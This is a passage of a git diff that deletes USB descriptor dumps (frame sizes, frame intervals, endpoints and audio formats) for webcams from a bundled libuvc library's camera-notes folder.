-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        12
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            864
-        wHeight                           480
-        dwMinBitRate                 33177600
-        dwMaxBitRate                199065600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        13
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            960
-        wHeight                           720
-        dwMinBitRate                 55296000
-        dwMaxBitRate                331776000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        14
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1024
-        wHeight                           576
-        dwMinBitRate                 47185920
-        dwMaxBitRate                283115520
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        15
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           720
-        dwMinBitRate                 73728000
-        dwMaxBitRate                442368000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        16
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                           896
-        dwMinBitRate                114688000
-        dwMaxBitRate                688128000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        17
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1920
-        wHeight                          1080
-        dwMinBitRate                165888000
-        dwMaxBitRate                995328000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     1 (BT.709,sRGB)
-        bTransferCharacteristics            1 (BT.709)
-        bMatrixCoefficients                 4 (SMPTE 170M (BT.601))
-      VideoStreaming Interface Descriptor:
-        bLength                            11
-        bDescriptorType                    36
-        bDescriptorSubtype                  6 (FORMAT_MJPEG)
-        bFormatIndex                        3
-        bNumFrameDescriptors               17
-        bFlags                              1
-          Fixed-size samples: Yes
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                 24576000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                            90
-        dwMinBitRate                  1152000
-        dwMaxBitRate                  6912000
-        dwMaxVideoFrameBufferSize       28800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                  1536000
-        dwMaxBitRate                  9216000
-        dwMaxVideoFrameBufferSize       38400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                  2027520
-        dwMaxBitRate                 12165120
-        dwMaxVideoFrameBufferSize       50688
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           180
-        dwMinBitRate                  4608000
-        dwMaxBitRate                 27648000
-        dwMaxVideoFrameBufferSize      115200
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                  6144000
-        dwMaxBitRate                 36864000
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                  8110080
-        dwMaxBitRate                 48660480
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            432
-        wHeight                           240
-        dwMinBitRate                  8294400
-        dwMaxBitRate                 49766400
-        dwMaxVideoFrameBufferSize      207360
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           360
-        dwMinBitRate                 18432000
-        dwMaxBitRate                110592000
-        dwMaxVideoFrameBufferSize      460800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        10
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           448
-        dwMinBitRate                 28672000
-        dwMaxBitRate                172032000
-        dwMaxVideoFrameBufferSize      716800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        11
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                 38400000
-        dwMaxBitRate                230400000
-        dwMaxVideoFrameBufferSize      960000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        12
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            864
-        wHeight                           480
-        dwMinBitRate                 33177600
-        dwMaxBitRate                199065600
-        dwMaxVideoFrameBufferSize      829440
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        13
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            960
-        wHeight                           720
-        dwMinBitRate                 55296000
-        dwMaxBitRate                331776000
-        dwMaxVideoFrameBufferSize     1382400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        14
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1024
-        wHeight                           576
-        dwMinBitRate                 47185920
-        dwMaxBitRate                283115520
-        dwMaxVideoFrameBufferSize     1179648
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        15
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           720
-        dwMinBitRate                 73728000
-        dwMaxBitRate                442368000
-        dwMaxVideoFrameBufferSize     1843200
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        16
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                           896
-        dwMinBitRate                114688000
-        dwMaxBitRate                688128000
-        dwMaxVideoFrameBufferSize     2867200
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        17
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1920
-        wHeight                          1080
-        dwMinBitRate                165888000
-        dwMaxBitRate                995328000
-        dwMaxVideoFrameBufferSize     4147200
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     1 (BT.709,sRGB)
-        bTransferCharacteristics            1 (BT.709)
-        bMatrixCoefficients                 4 (SMPTE 170M (BT.601))
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x00c0  1x 192 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       2
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0180  1x 384 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       3
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0200  1x 512 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       4
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0280  1x 640 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       5
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0320  1x 800 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       6
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x03b0  1x 944 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       7
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0a80  2x 640 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       8
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0b20  2x 800 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       9
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0be0  2x 992 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting      10
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1380  3x 896 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting      11
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x13fc  3x 1020 bytes
-        bInterval               1
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         2
-      bInterfaceCount         2
-      bFunctionClass          1 Audio
-      bFunctionSubClass       2 Streaming
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        2
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      1 Control Device
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdADC               1.00
-        wTotalLength           38
-        bInCollection           1
-        baInterfaceNr( 0)       3
-      AudioControl Interface Descriptor:
-        bLength                12
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Microphone
-        bAssocTerminal          0
-        bNrChannels             1
-        wChannelConfig     0x0003
-          Left Front (L)
-          Right Front (R)
-        iChannelNames           0 
-        iTerminal               0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               5
-        iTerminal               0 
-      AudioControl Interface Descriptor:
-        bLength                 8
-        bDescriptorType        36
-        bDescriptorSubtype      6 (FEATURE_UNIT)
-        bUnitID                 5
-        bSourceID               1
-        bControlSize            1
-        bmaControls( 0)      0x03
-          Mute Control
-          Volume Control
-        iFeature                0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                255 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             2
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        16000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0044  1x 68 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       2
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                255 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             2
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        24000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0064  1x 100 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       3
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                255 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             2
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        32000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0084  1x 132 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-Device Qualifier (for other device speed):
-  bLength                10
-  bDescriptorType         6
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  bNumConfigurations      1
-Device Status:     0x0000
-  (Bus Powered)
diff --git a/thirdparty/libuvc-0.0.6/cameras/ms_lifecam_show.txt b/thirdparty/libuvc-0.0.6/cameras/ms_lifecam_show.txt
deleted file mode 100644
index d8f9650..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/ms_lifecam_show.txt
+++ /dev/null
@@ -1,767 +0,0 @@
-
-Bus 001 Device 010: ID 045e:0729 Microsoft Corp. 
-Device Descriptor:
-  bLength                18
-  bDescriptorType         1
